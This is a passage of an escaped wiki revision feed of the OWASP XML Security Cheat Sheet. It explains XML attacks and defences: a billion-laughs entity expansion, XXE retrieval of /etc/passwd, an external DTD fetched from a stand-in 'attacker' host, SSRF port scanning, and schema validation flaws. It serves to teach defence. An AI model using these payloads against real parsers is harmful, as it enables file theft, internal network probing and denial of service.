  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt; &lt;br /&gt;
&amp;lt;SOAP:ENVELOPE ENTITYREFERENCE=&amp;quot;&amp;amp;LOL9;&amp;quot; XMLNS:SOAP=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;SOAP:BODY&amp;gt; &lt;br /&gt;
    &amp;lt;KEYWORD XMLNS=&amp;quot;URN:PARASOFT:WS:STORE&amp;quot;&amp;gt;FOO&amp;lt;/KEYWORD&amp;gt;&lt;br /&gt;
  &amp;lt;/SOAP:BODY&amp;gt;&lt;br /&gt;
&amp;lt;/SOAP:ENVELOPE&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
RFC 2376 states that &amp;quot;Recursive expansions are prohibited [REC-XML] and XML processors are required to detect them&amp;quot;. To detect this type of behavior automatically, you must limit the number of expansions to be made, or disable the use of inline DTD schemas altogether in your XML parsing objects.  SOAP messages should be inherently safe from this vulnerability because “a SOAP message MUST NOT contain a document type declaration,”  but when this type of vulnerability was detected, certain implementations did not comply with this rule. &lt;br /&gt;
&lt;br /&gt;
=== Reflected File Retrieval ===&lt;br /&gt;
Consider the following example code of an XXE:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE includeme [&lt;br /&gt;
  &amp;lt;!ELEMENT includeme ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY xxe SYSTEM &amp;quot;/etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;includeme&amp;gt;&amp;amp;xxe;&amp;lt;/includeme&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous XML defines an entity named &amp;lt;tt&amp;gt;xxe&amp;lt;/tt&amp;gt;, which is in fact the contents of &amp;lt;tt&amp;gt;/etc/passwd&amp;lt;/tt&amp;gt;, which will be expanded within the &amp;lt;tt&amp;gt;includeme&amp;lt;/tt&amp;gt; tag. If the parser allows references to external entities, it might include the contents of that file in the XML response or in the error output. &lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
To avoid a file retrieval attack, avoid using DTD and validate the content of XML documents according to the expected values of a local XML schema.&lt;br /&gt;
&lt;br /&gt;
=== Server Side Request Forgery ===&lt;br /&gt;
Server Side Request Forgery (SSRF ) happens when the server receives a malicious XML schema, which makes the server retrieve remote resources such as a file, a file via HTTP/HTTPS/FTP, etc. SSRF has been used to retrieve remote files, to prove a XXE when you cannot reflect back the file or perform port scanning, or perform brute force attacks on internal networks.&lt;br /&gt;
&lt;br /&gt;
==== External File Retrieval ====&lt;br /&gt;
Whenever there is an XXE and you cannot retrieve a file, you can test if you would be able to establish remote connections:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [ &lt;br /&gt;
  &amp;lt;!ENTITY %xxe SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt; &lt;br /&gt;
  %xxe;&lt;br /&gt;
]&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Port Scanning ====&lt;br /&gt;
The amount and type of information will depend on the type of implementation. Responses can be classified as follows, ranking from easy to complex:&lt;br /&gt;
&lt;br /&gt;
''' 1) Complete Disclosure '''&lt;br /&gt;
The simplest and most unusual scenario, with complete disclosure you can clearly see what’s going on by receiving the complete responses from the server being queried. You have an exact representation of what happened when connecting to the remote host.&lt;br /&gt;
&lt;br /&gt;
''' 2) Error-based '''&lt;br /&gt;
If you are unable to see the response from the remote server, you may be able to use the error response. Consider a web service leaking details on what went wrong in the SOAP Fault element when trying to establish a connection: &lt;br /&gt;
 &amp;lt;pre&amp;gt;java.io.IOException: Server returned HTTP response code: 401 for URL: http://192.168.1.1:80&lt;br /&gt;
	at sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1459)&lt;br /&gt;
	at com.sun.org.apache.xerces.internal.impl.XMLEntityManager.setupCurrentEntity(XMLEntityManager.java:674)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' 3) Timeout-based '''&lt;br /&gt;
Timeouts could occur when connecting to open or closed ports depending on the schema and the underlying implementation. If the timeouts occur while you are trying to connect to a closed port (which may take one minute), the time of response when connected to a valid port will be very quick (one second, for example). The differences between open and closed ports becomes quite clear.   &lt;br /&gt;
&lt;br /&gt;
''' 4) Time-based '''&lt;br /&gt;
Sometimes differences between closed and open ports are very subtle. The only way to know the status of a port with certainty would be to take multiple measurements of the time required to reach each host; then analyze the average time for each port to determinate the status of each port. This type of attack will be difficult to accomplish when performed in higher latency networks.&lt;br /&gt;
&lt;br /&gt;
==== Brute Forcing ====&lt;br /&gt;
Once an attacker confirms that it is possible to perform a port scan, performing a brute force attack is a matter of embedding the &amp;lt;tt&amp;gt;username&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;password&amp;lt;/tt&amp;gt; as part of the URI scheme. For example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;foo://username:password@example.com:8080/&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
To avoid this attack, do not use DTD.&lt;br /&gt;
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
[mailto:fernando.arnaboldi@ioactive.com Fernando Arnaboldi]&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224415</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224415"/>
				<updated>2016-12-21T18:49:40Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This cheat sheet exposes how to exploit the different possibilities in libraries and software. &lt;br /&gt;
&lt;br /&gt;
=  Malformed XML Documents =&lt;br /&gt;
The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, it must be considered a fatal error and the data it contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution once detecting a fatal error. The document should not undergo any additional processing, and the application should display an error message.&lt;br /&gt;
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS). &lt;br /&gt;
&lt;br /&gt;
To analyze the likelihood of this attack, analyze the time taken by a regular XML document vs the time taken by a malformed version of that same document. Then, consider how an attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents to amplify the effect.&lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
To avoid this attack, you must confirm that your version of the XML processor does not take significant additional time to process malformed documents.&lt;br /&gt;
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.&lt;br /&gt;
&lt;br /&gt;
The following two scenarios illustrate attack vectors a parser will analyze in recovery mode:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document ===&lt;br /&gt;
According to the XML specification, the string &amp;lt;tt&amp;gt;--&amp;lt;/tt&amp;gt; (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;!-- one&lt;br /&gt;
    &amp;lt;!-- another comment&lt;br /&gt;
  comment --&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document Normalized ===&lt;br /&gt;
Certain parsers may consider normalizing the contents of your &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; sections. This means that they will update the special characters contained in the &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section to contain the safe versions of these characters even though is not required: &lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;![CDATA[&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;]]&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Normalization of a &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt; &lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
If it is not possible to process only well-formed documents, take into consideration that the final results could be unreliable. To avoid this attack completely, you must not recover or process malformed documents.&lt;br /&gt;
&lt;br /&gt;
== Coersive Parsing ==&lt;br /&gt;
A coercive attack in XML involves parsing deeply nested XML documents without their corresponding ending tags. The idea is to make the victim use up —and eventually deplete— the machine’s resources and cause a denial of service on the target.&lt;br /&gt;
Reports of a DoS attack in Firefox 3.67 included the use of 30,000 open XML elements without their corresponding ending tags. Removing the closing tags simplified the attack since it requires only half of the size of a well-formed document to accomplish the same results. The number of tags being processed eventually caused a stack overflow. A simplified version of such a document would look like this: &lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;A1&amp;gt;&lt;br /&gt;
  &amp;lt;A2&amp;gt; &lt;br /&gt;
   &amp;lt;A3&amp;gt;&lt;br /&gt;
     ...&lt;br /&gt;
      &amp;lt;A30000&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
To avoid this attack you must define a maximum number of items (elements, attributes, entities, etc.) to be processed by the parser. An XML schema could also be used to validate the document structure before being parsed.&lt;br /&gt;
&lt;br /&gt;
== Violation of XML Specification Rules ==&lt;br /&gt;
Unexpected consequences may result from manipulating documents using parsers that do not follow W3C specifications. It may be possible to achieve crashes and/or code execution when the software does not properly verify how to handle incorrect XML structures. Feeding the software with fuzzed XML documents may expose this behavior. &lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
To avoid this attack you must use an XML processor that follows W3C specifications. In addition, validate the contents of each element and attribute to process only valid values within predefined boundaries.&lt;br /&gt;
&lt;br /&gt;
= Invalid XML Documents =&lt;br /&gt;
Attackers may introduce unexpected values in documents to take advantage of an application that does not verify whether the document contains a valid set of values. Schemas specify restrictions that help identify whether documents are valid. A valid document is well formed and complies with the restrictions of a schema, and more than one schema can be used to validate a document. These restrictions may appear in multiple files, either using a single schema language or relying on the strengths of the different schema languages.&lt;br /&gt;
&lt;br /&gt;
== Document without Schema ==&lt;br /&gt;
Consider a bookseller that uses a web service through a web interface to make transactions. The XML document for transactions is composed of two elements: an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value related to an item and a certain &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;. The user may only introduce a certain &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value using the web interface:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;123&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
&amp;lt;/buy&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If there is no control on the document’s structure, the application could also process different well-formed messages with unintended consequences. The previous document could have contained additional tags to affect the behavior of the underlying application processing its contents:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;123&amp;lt;/id&amp;gt;&amp;lt;price&amp;gt;0&amp;lt;/price&amp;gt;&amp;lt;id&amp;gt;&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
&amp;lt;/buy&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notice again how the value 123 is supplied as an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt;, but now the document includes additional opening and closing tags. The attacker closed the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element and sets a bogus &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; element to the value 0. The final step to keep the structure well-formed is to add one empty &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element. After this, the application adds the closing tag for &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and set the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; to 10.  If the application processes only the first values provided for the id and the value without performing any type of control on the structure, it could benefit the attacker by providing the ability to buy a book without actually paying for it. &lt;br /&gt;
&lt;br /&gt;
; Recommendation&lt;br /&gt;
Each XML document must have a precisely defined XML schema with every piece of information properly restricted to avoid problems of improper data validation. &lt;br /&gt;
&lt;br /&gt;
== Unrestrictive Schema ==&lt;br /&gt;
Certain schemas do not offer enough restrictions for the type of data that each element can receive. This is what normally happens when using DTD; it has a very limited set of possibilities compared to the type of restrictions that can be applied in XML documents. This could expose the application to undesired values within elements or attributes that would be easy to constrain when using other schema languages. In the following example, a person’s &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; is validated against an inline DTD schema:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE person [&lt;br /&gt;
  &amp;lt;!ELEMENT person (name, age)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT name (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT age (#PCDATA)&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;person&amp;gt;&lt;br /&gt;
  &amp;lt;name&amp;gt;John Doe&amp;lt;/name&amp;gt;&lt;br /&gt;
  &amp;lt;age&amp;gt;11111..(1.000.000digits)..11111&amp;lt;/age&amp;gt;&lt;br /&gt;
&amp;lt;/person&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous document contains an inline DTD with a root element named &amp;lt;tt&amp;gt;person&amp;lt;/tt&amp;gt;. This element contains two elements in a specific order: &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and then &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. The element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; is then defined to contain &amp;lt;tt&amp;gt;PCDATA&amp;lt;/tt&amp;gt; as well as the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. After this definition begins the well-formed and valid XML document. The element name contains an irrelevant value but the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element contains one million digits. Since there are no restrictions on the maximum size for the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element, this one-million-digit string could be sent to the server for this element. Typically this type of element should be restricted to contain no more than a certain amount of characters and constrained to a certain set of characters (for example, digits from 0 to 9, the + sign and the - sign).&lt;br /&gt;
If not properly restricted, applications may handle potentially invalid values contained in documents. Since it is not possible to indicate specific restrictions (a maximum length for the element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; or a valid range for the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;), this type of schema increases the risk of affecting the integrity and availability of resources.&lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
Use a schema language capable of properly restricting information.&lt;br /&gt;
&lt;br /&gt;
== Improper Data Validation == &lt;br /&gt;
When schemas are insecurely defined and do not provide strict rules, they may expose the application to diverse situations. The result of this could be the disclosure of internal errors or documents that hit the application’s functionality with unexpected values.&lt;br /&gt;
&lt;br /&gt;
=== String Data Types ===&lt;br /&gt;
Provided you need to use a hexadecimal value, there is no point in defining this value as a string that will later be restricted to the specific 16 hexadecimal characters. To exemplify this scenario, when using XML encryption  some values must be encoded using base64 . This is the schema definition of how these values should look:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element name='CipherData' type='xenc:CipherDataType'/&amp;gt;&lt;br /&gt;
&amp;lt;complexType name='CipherDataType'&amp;gt;&lt;br /&gt;
  &amp;lt;choice&amp;gt;&lt;br /&gt;
    &amp;lt;element name='CipherValue' type='base64Binary'/&amp;gt;&lt;br /&gt;
    &amp;lt;element ref='xenc:CipherReference'/&amp;gt;&lt;br /&gt;
  &amp;lt;/choice&amp;gt;&lt;br /&gt;
&amp;lt;/complexType&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
The previous schema defines the element &amp;lt;tt&amp;gt;CipherValue&amp;lt;/tt&amp;gt; as a base64 data type. As an example, the IBM WebSphere DataPower SOA Appliance allowed any type of characters within this element after a valid base64 value, and will consider it valid. The first portion of this data is properly checked as a base64 value, but the remaining characters could be anything else (including other sub-elements of the &amp;lt;tt&amp;gt;CipherData&amp;lt;/tt&amp;gt; element). Restrictions are partially set for the element, which means that the information is probably tested using an application instead of the proposed sample schema. &lt;br /&gt;
&lt;br /&gt;
=== Numeric Data Types ===&lt;br /&gt;
Defining the correct data type for numbers could be a little bit more complex, since there are more options than there are for strings. You could start this process by asking some initial questions:&lt;br /&gt;
* Can the value be a real number?&lt;br /&gt;
* What is the number range? &lt;br /&gt;
* Is precise calculation required?&lt;br /&gt;
The next sample scenarios will analyze different attacks involving numeric data types.&lt;br /&gt;
&lt;br /&gt;
==== Negative and Positive Restrictions ====&lt;br /&gt;
XML Schema numeric data types can include different ranges of numbers. They could include:&lt;br /&gt;
* Negative and positive numbers&lt;br /&gt;
* Only negative numbers&lt;br /&gt;
* Negative numbers and the zero value&lt;br /&gt;
* Only positive numbers&lt;br /&gt;
* Positive numbers and the zero value&lt;br /&gt;
The following sample document defines an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; for a product, a &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;, and a &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; value that is under the control of an attacker:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;1&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
  &amp;lt;quantity&amp;gt;1&amp;lt;/quantity&amp;gt;&lt;br /&gt;
&amp;lt;/buy&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
To avoid repeating old errors, an XML schema may be defined to prevent processing the incorrect structure in cases where an attacker wants to introduce additional elements:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&amp;lt;/xs:schema&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
Limiting that &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; to an integer data type will avoid any unexpected characters. Once the application receives the previous message, it may calculate the final price by doing &amp;lt;tt&amp;gt;price*quantity&amp;lt;/tt&amp;gt;. However, since this data type may allow negative values, it might allow a negative result on the user’s account if an attacker provides a negative number. What you probably want to see in here to avoid that logical vulnerability is positiveInteger instead of integer. &lt;br /&gt;
&lt;br /&gt;
==== Divide by Zero ====&lt;br /&gt;
Whenever using user controlled values as denominators in a division, developers should avoid allowing the number zero.  In cases where the value zero is used for division in XSLT, the error &amp;lt;tt&amp;gt;FOAR0001&amp;lt;/tt&amp;gt; will occur. Other applications may throw other exceptions and the program may crash. There are specific data types for XML schemas that specifically avoid using the zero value. For example, in cases where negative values and zero are not considered valid, the schema could specify the data type &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; for the element. &lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
The element &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; is now restricted to positive integers. This means that only values greater than zero will be considered valid. If you see any other type of restriction being used, you may trigger an error if the denominator is zero.&lt;br /&gt;
&lt;br /&gt;
==== Special Values: Infinity and Not a Number (NaN) ====&lt;br /&gt;
The data types &amp;lt;tt&amp;gt;float&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;double&amp;lt;/tt&amp;gt; contain real numbers and some special values: &amp;lt;tt&amp;gt;-Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;-INF&amp;lt;/tt&amp;gt;, &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt;, and &amp;lt;tt&amp;gt;+Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;INF&amp;lt;/tt&amp;gt;. These possibilities may be useful to express certain values, but they are sometimes misused. The problem is that they are commonly used to express only real numbers such as prices. This is a common error seen in other programming languages, not solely restricted to these technologies.&lt;br /&gt;
Not considering the whole spectrum of possible values for a data type could make underlying applications fail. If the special values Infinity and &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt; are not required and only real numbers are expected, the data type decimal is recommended:&lt;br /&gt;
&amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
Code Sample 23: An XML Schema providing a set of restrictions over the document on Code 18&lt;br /&gt;
The price value will not trigger any errors when set at Infinity or NaN, because these values will not be valid. An attacker can exploit this issue if those values are allowed.&lt;br /&gt;
&lt;br /&gt;
=== General Data Restrictions ===&lt;br /&gt;
After selecting the appropriate data type, developers may apply additional restrictions. Sometimes only a certain subset of values within a data type will be considered valid:&lt;br /&gt;
&lt;br /&gt;
==== Prefixed Values ====&lt;br /&gt;
Certain types of values should only be restricted to specific sets: traffic lights will have only three types of colors, only 12 months are available, and so on. It is possible that the schema has these restrictions in place for each element or attribute. This is the most perfect whitelist scenario for an application: only specific values will be accepted. Such a constraint is called &amp;lt;tt&amp;gt;enumeration&amp;lt;/tt&amp;gt; in XML schema. The following example restricts the contents of the element month to 12 possible values:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;month&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;January&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;February&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;March&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;April&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;May&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;June&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;July&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;August&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;September&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;October&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;November&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;December&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
By limiting the month element’s value to any of the previous values, the application will not be manipulating random strings.&lt;br /&gt;
&lt;br /&gt;
==== Ranges ====&lt;br /&gt;
